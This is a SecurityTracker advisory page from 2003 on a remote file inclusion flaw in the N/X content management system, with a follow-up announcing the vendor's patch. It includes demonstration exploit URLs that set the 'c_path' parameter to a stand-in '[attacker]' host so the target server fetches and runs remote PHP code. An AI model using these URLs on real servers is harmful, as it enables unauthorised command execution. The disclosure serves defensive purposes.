SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   N/X Vendors:   nxwcms.sourceforge.net
(Vendor Issues Patch) Re: N/X Content Management System Include File Error Lets Remote Users Execute Arbitrary Commands on the Server
SecurityTracker Alert ID:  1006008
SecurityTracker URL:  http://securitytracker.com/id/1006008
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 29 2003
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 2002 PreRelease 1
Description:   An include file vulnerability was reported in the N/X web content management system. A remote user can execute arbitrary commands on the system.

It is reported that the 'menu.inc.php', 'datasets.php', and 'mass_opeations.inc.php' scripts reference the '$c_path' variable but do not verify user-supplied values for that variable. A remote user can supply a value that points to a URL on a web server that the remote user controls to cause the server to include an arbitrary file of the remote user's choice. The arbitrary file can include arbitrary PHP code (including operating system commands) that will be executed on the target server.

Some demonstration exploit URLs (with associated attacker file URLs) are provided:

http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/

with

http://[attacker]/common/lib/launch.inc.php


http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/

with

http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/recordset.php
http://[attacker]/common/dbo/deleteset.php
http://[attacker]/common/dbo/updateset.php
http://[attacker]/common/dbo/insertset.php

Impact:   A remote user can execute arbitrary operating system commands on the target server with the privileges of the target server.
Solution:   The vendor has released SecurityPatch 1 (NX2002-Security_Pathc.zip), to be applied to all versions of N/X. The patch is available at:

http://www.sourceforge.net/projects/nxwcms

Vendor URL:  nxwcms.sourceforge.net/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Jan 2 2003 N/X Content Management System Include File Error Lets Remote Users Execute Arbitrary Commands on the Server



 Source Message Contents

Subject:  Fix for N/X


The vendor has released SecurityPatch 1 (NX2002-Security_Pathc.zip) to be applied to all versions of
N/X.  The patch is available at:

http://www.sourceforge.net/projects/nxwcms

Thanks to Sven for notifying us of this fix.



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC